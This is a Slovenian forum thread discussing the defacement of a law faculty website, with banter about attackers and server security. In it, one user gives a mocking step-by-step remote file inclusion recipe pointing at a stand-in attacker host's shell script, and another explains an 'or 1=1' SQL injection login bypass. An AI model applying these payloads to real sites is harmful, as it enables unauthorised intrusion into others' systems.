» »

Razobličenje spletne strani Pravne fakultete

1
2
3

MrStein ::

Pyr0Beast:
a še komu zapre ff na linku od Urc-a?

Meni ne. FF 2.0.0.1 na w2k
Motiti se je človeško.
Motiti se pogosto je neumno.
Vztrajati pri zmoti je... oh, pozdravljen!

mafijc ::

hehe so zrihtal madona pa praznk je...

lambda ::

jype ::

nubes: to ni mogoče, to je IIS! Tega se ne da shekat!

-_- ::

Eden njegov exploit ki ga je verjetno uporabil.

iggy ::

Za foro sem si dodal tega x-turka na msn, da vidim kakšen tipo je to. Človek je takoj vedel da sem iz slovenije in da imamo v naši državici zelo slabo varnost kar se tiče informaciske tehnologije. Dal mi je tudi neke linke do ene strani ker ima človek napisanih n-tutorialov glede varnosti.
Hey, you're fat!

denial ::

Pa ga prosim vprašaj, če lahko argumentira, da imamo v .SI "zelo slabo varnost kar se tiče informacijske tehnologije". Najbrž ne sklepa zgolj iz tega, ker je 0wnal par univerzitetnih serverjev?

PS: Ali lahko vidimo te njegove tutoriale?
SELECT finger FROM hand WHERE id=3;

Zgodovina sprememb…

  • spremenil: denial ()

Looooooka ::

ja itak da mamo v sloveniji za en drek varnost.
te streznike postavlajo smrkavci,ki "obvladajo" linux.ce pogledas OS vecine hekanih strani je na vecini gor linux.
Problem je pa ta da tko veselo instalirajo neki s cdja zalaufajo apache in to je to.Ce pa ze kj vec nardijo pa pol pozabjo patchat pa redno upgrejdat zadeve in gre vse v tri krasne po par tednih.
takim adminom bi blo velik bols na windows 2000 al pa 2003 pa naj autoupdate vklopjo.
za lenuhe pa pretenderje pac ni administracija.me tud zanima kok jih je dejansko poslal mail da so zvedl kje je bil problem =)
hm manjsi popravek.sm glih opazu da sm post tko napisu da zgleda k da je windows 2000 trdnjava....
povedat sm hotu da majo taki lenuhi vecjo moznost da jih ne bojo ownal na winsih z autoupdate...ker na prejsnem OS-ju itak nc niso delal =)

Zgodovina sprememb…

zerox ::

http://www.zone-h.org/component/option,...

Resolved [ orodje.info ] to 195.246.8.55
Resolved [ pora-gr.si ] to 195.246.8.55
Resolved [ podsvojostreho.net ] to 195.246.8.55
Resolved [ prometnovarnostnicenter.si ] to 195.246.8.55
Resolved [ pgp-nepremicnine.com ] to 195.246.8.55
Resolved [ plavalniklub-ilirija.si ] to 195.246.8.55
Resolved [ raduha.com ] to 195.246.8.55
Resolved [ mreze-frlic.si ] to 195.246.8.55
Resolved [ lavie.si ] to 195.246.8.55

itd...

a nam to kaj pove ?

Looooooka ::

http://195.246.8.55

pove ja...da si je nekdo vzel FUL cajta da je zrihtu zadevo predn jo je zacel nucat za hostanje.
lazy bastard :D

Daedalus ::


te streznike postavlajo smrkavci,ki "obvladajo" linux.ce pogledas OS vecine hekanih strani je na vecini gor linux.
Problem je pa ta da tko veselo instalirajo neki s cdja zalaufajo apache in to je to.Ce pa ze kj vec nardijo pa pol pozabjo patchat pa redno upgrejdat zadeve in gre vse v tri krasne po par tednih.
takim adminom bi blo velik bols na windows 2000 al pa 2003 pa naj autoupdate vklopjo.


Ja, to bi rešlo problem nesposobnih adminov. Autoupdate, namreč:\ Če folk nima pojma, nima pojma. Če nimaš pojma, ti tud windowz point'n'click čisto nič ne pomeni. Ker pač nimaš pojma in ne boš znal stvari postavit tako, da bi ble vsaj približno varne. Jaki vam argumenti, ni kaj.
Man is condemned to be free; because once thrown into the world,
he is responsible for everything he does.
[J.P.Sartre]

iggy ::

Btw ni mi jasno kako so sploh našli naše strani saj teji "crackerji" komaj da znajo govoriti angleško. Se pogovarjam z njim na msnju komaj da ga razumem.
Hey, you're fat!

darkolord ::

Zakaj bi moral razumet angleško da nekaj crackneš?

iMark ::

lol >:D :D

amigo_no1 ::

Naslov komada ?

Celeborn ::

iggy: a lahko prilimaš link do te strani s tutoriali o varnosti?
If air travel is so safe, why do they call it a "terminal"?

denial ::

m4d h4X0r sk1llz:

1.) greš na milw0rm in filtriraš vse Remote File Inclusion exploite
2.) greš na Google in vneseš "inurl: ranljiva_skripta.php"
3.) kilkneš na prvi link, dodaš:
url/ranljiva_skripta.php?include_path="http://m4d_hax0r.com/ shell.php"
4.) 0wn3d!
5.) greš na MSN/IRC/zone-h ter obelodaniš podvig (ne pozabiš omeniti, da security suxxx)

Vsakršna pod(r)obnost je zgolj naključna...
SELECT finger FROM hand WHERE id=3;

Zgodovina sprememb…

  • spremenil: denial ()

Hardstyle ::

Če je tip na msnju potem pa ni problem IPja resolvat :)

Pyr0Beast ::

Ujej. .. auto-add ma. Makes you think
Script kiddzor. Kaj si želim, da bi se mu neki slabga zgodilo.
Some nanoparticles are more equal than others

Good work: Any notion of sanity and critical thought is off-topic in this place

joker16_7 ::

Ja, če je na msnju mu resolvaš IP. Pol pa itak ni problem resolvat še njegovo trenutno lokacijo. Pa sam škife še pošleš nekam v Turčijo pa zagrabjo smrkavca. >:D

P.S. Razen če ni povezan prek kerega shekanega serverja. Pol se zadeva zaplete:\
"Ambition is the path to success. Persistence is the vehicle you arrive in."
Bill Bradley

Pyr0Beast ::

Bomo mal pogledal za njegovim ip-jem
Mulc je baje gor
Some nanoparticles are more equal than others

Good work: Any notion of sanity and critical thought is off-topic in this place

Kenpachi ::

In o koliko let starem mulčku se to pogovarjamo? 12? 13?
Zaraki Kenpachi.

bremzzi ::

Koga boste pa poslali, da ga primejo? FBI, CIO?

joker16_7 ::

Eh, kr osebno ko grem poleti v Turčijo ga grem nabit. Sam lokacijo povejte.....:D
"Ambition is the path to success. Persistence is the vehicle you arrive in."
Bill Bradley

iMark ::

Ja in kej je težko dobit njegov IP?
Če že drugače ne pa tko da se mu da link od kšne strani (foruma), on gre gor, pa je ;) :D

Zgodovina sprememb…

  • spremenil: iMark ()

W3by ::

Zanima me zakaj mulca ne morjo dobit? Očitno se zna usej dobro prikrit.

Glede security na slovenskih straneh pa sploh no comment. Zadnič sem tko u easy mal gledal eno stran, za foro napišem admin/ se odpre login, dam not SQL injection in lejga že sm not. Simpl k pasulj. Tale očitno cila na include fajlov...:|

joker16_7 ::

In ka je to SQL injection?

P.S. Al si dobesedno to napiso? :\
"Ambition is the path to success. Persistence is the vehicle you arrive in."
Bill Bradley

Zgodovina sprememb…

overlord_tm ::

W3by ::

Pac na eni strani, ki zares obstaja :D :D No sej ne recem - je ze starejsa pa to pa tud admini so zabiti, vendar bi useen lahko poskrbel za varnost. Naslova pa useen nebi dajal na ogled 8-)

Celeborn ::

Pa ste prepričani da se da preko MSN-ja izvedet IP? A ne gre vsa komunikacija preko Microsoftovega strežnika?
If air travel is so safe, why do they call it a "terminal"?

iggy ::

Dalo se je izvedeti pri starejših verzijah. Zdaj se da izvedeti samo če pošlješ file in tako izveš IP
Hey, you're fat!

TylerDurden ::

V bistvu sem avtor strani PF jaz, žal so me pred 2 leti odstavili s projekta zaradi novega kadra, ki ne ve kaj je PHP niti MySQL, še manj pa kaj je strežnik :\ .

Ob vdoru je klonil security hosterjev kelt.si in ne stran, če smo že ravno pri tem.

Žalostno je, da so rabili več kot 24 ur, da so zbrisali tisti index.html.
Let\'s make some soap ...

orbiter ::

Strani hekajo zgolgočaseni kreteni, ki imajo v življenju le dvoje - računalnik ter gnile možgane. :\

Pyr0Beast ::

Pa niti ne. samo malenkost morale in družbe jim primanjkuje. dejansko lahko tega človeka psihično čisto do dna potlačiš s parimi besedami :P
Some nanoparticles are more equal than others

Good work: Any notion of sanity and critical thought is off-topic in this place

overlord_tm ::

Kje je edward za counterattack =)

joker16_7 ::

A lahk please en bolj po slovensko in na izi način pove ka je to SQL, ker nimam blage veze ka to pomen pa sem vse prebral na wikipediji...please...:\
"Ambition is the path to success. Persistence is the vehicle you arrive in."
Bill Bradley

Kenpachi ::

SQL @ Wikipedia

Citat: "SQL ali strukturirani povpraševalni jezik za delo s podatkovnimi bazami (angl. Structured Query Language) je povpraševalni jezik, ki je namenjen delu s podatkovnimi zbirkami, s programskimi stavki, ki posnemajo ukaze v naravnem jeziku."

Bolj na izi ne bi moglo it.
Zaraki Kenpachi.

joker16_7 ::

No, zdaj kapiram. In kaj to koristi pri vpisovanju pod admina, kot je nekdo nekaj sporočil nazaj omenil....:\
"Ambition is the path to success. Persistence is the vehicle you arrive in."
Bill Bradley

Roadkill ::

SQL injection v grobem pomeni, da lahko izkoristiš slabo spisano kodo, da namesto, da bi v polje password vpisal dejansko geslo, vpišeš SQL stavek, ki je vedno resničen.

Torej za uporabniško ime napišeš "Administrator" za geslo pa napišeš nekaj v stilu "lala' or 1 = 1;"
To pomeni, da zaradi slabo napisanega SQL stavka lahko user v vnosnem polju sam nadaljuje SQL stavek, kjer je zelo enostavno doseči, da bo ta stavek vedno resničen (1=1 je vedno res).

Tale primer je nepopoln in trivialen, ampak mislim, da vsaj na daleč povzame bistvo.
Ü

Karlos ::

Če slika pove več kot 1000 besed potem video pove več kot 10^6 besed...
Evo link iz angleške wikipedije SQL injection na delu
Sai Baba: "Dam vam to, kar hočete, da boste hoteli to, kar vam želim dati."

Person ::

Hm, a pa to vedno dela, da se lahko prijaviš v sistem, če si pač vnostni form shraniš na disk?
Pač jaz sem si form od naše fakultete shranil na disk, pa se hotel s svojim geslom prijaviti v sitem (pač da ne bi vedno rabil gesla vpisovati, ker pač si firefox v tem primeru gesla ne zna zapomnit).
No, pa ni šlo ... uspelo mi je edino, da so me začasno blokirali:\
Let's make something useful!

overlord_tm ::

Mogoče čekirajo refferal (s katere strani si prišel). V tem primeru pa pomaga javascript injection =)

joker16_7 ::

Roadkiller zelo lepo si napisal, tnx.;) Se pravi napišeš v mesto za password lol 1=1 in je to to. :\
"Ambition is the path to success. Persistence is the vehicle you arrive in."
Bill Bradley

bremzzi ::

ne, pa najprej se nauči malo recimo mysqla in phpja, da ti bo sploh jasno kaj se dogaja pri celi stvari

overlord_tm ::

joker ... približno tako ja ... samo kot so ti že svetoval. Če te zanima se nauči PHP/MySql ali kako podobno kombinacijo, ki za bazo uporabla MySql. Ker če pač ne delaš s temi orodji, je tak javascript injection ubistvu nemogoče razložit. Vsaj na podlagi ene 10 sošolcev, ko rabiš na neki "hackerski" strani za končanje misije uporabo MySql injectiona in noben ni dojel zakaj se gre. Na koncu pač skopirajo tisto kar jim poveš in so happy.

joker16_7 ::

Sam res. A ve kdo za kak vodič oz. knjigco o tem kar koli že omenjaš overlord_tm? Oz. čemu sploh nuca če veš ta jezik na pamet oz. se spoznaš na delo z njim? A to kej koristi pri izdelavi spletne strani? :\

P.S. Saj vem da se neumno sliši, ampak proso bi mal potrpežljivsoti, ker sem ko ka že na tem področju še ful boli:D ....sj vem da ste.....;)
"Ambition is the path to success. Persistence is the vehicle you arrive in."
Bill Bradley

sidd ::

joker16_7: ti svetujem, da si dobiš kak pdf, al pa v knjižnico, pa najprej sam malo prebereš ;) Ker ko skapiraš po lastni logiki, si nekaj naredil. Če te pač samo informativno zanima stavek dva, pa ti naj kr nekdo razlaga če mu je :P :D
no idea for signature
signed
I

joker16_7 ::

Nene, sj glih to rabm. Pdf priročnik ali kar koli podobnega. Knjiga mi glih ni najbolj po srcu. Če mate kak link bi proso.....0:)
"Ambition is the path to success. Persistence is the vehicle you arrive in."
Bill Bradley

bremzzi ::

Napiši v google php mysql tutorial pa se začni učit programiranja.
Ko ti bo enkrat programska logika postala jasna (pogojnimi stavki ipd.) ti bo tudi popolnoma jasno kaj je tale SQL injection in kako deluje.

overlord_tm ::

1
2
3


Vredno ogleda ...

TemaSporočilaOglediZadnje sporočilo
TemaSporočilaOglediZadnje sporočilo
»

[PF] Programi za izpopolnjevanje

Oddelek: Šola
81750 (1448) Raptor F16
»

Razobličenje spletne strani Pravne fakultete (strani: 1 2 3 )

Oddelek: Novice / Varnost
10117401 (12389) gzibret
»

Hekerji so poskušali sabotirati svetovni splet

Oddelek: Loža
111653 (1187) sidd
»

Domače branje: "Bogataj, Maja (ur.). 2003. Internet in pravo. Ljubljana: Pravna fakul

Oddelek: Novice / Domače branje
114111 (3596) poweroff

Več podobnih tem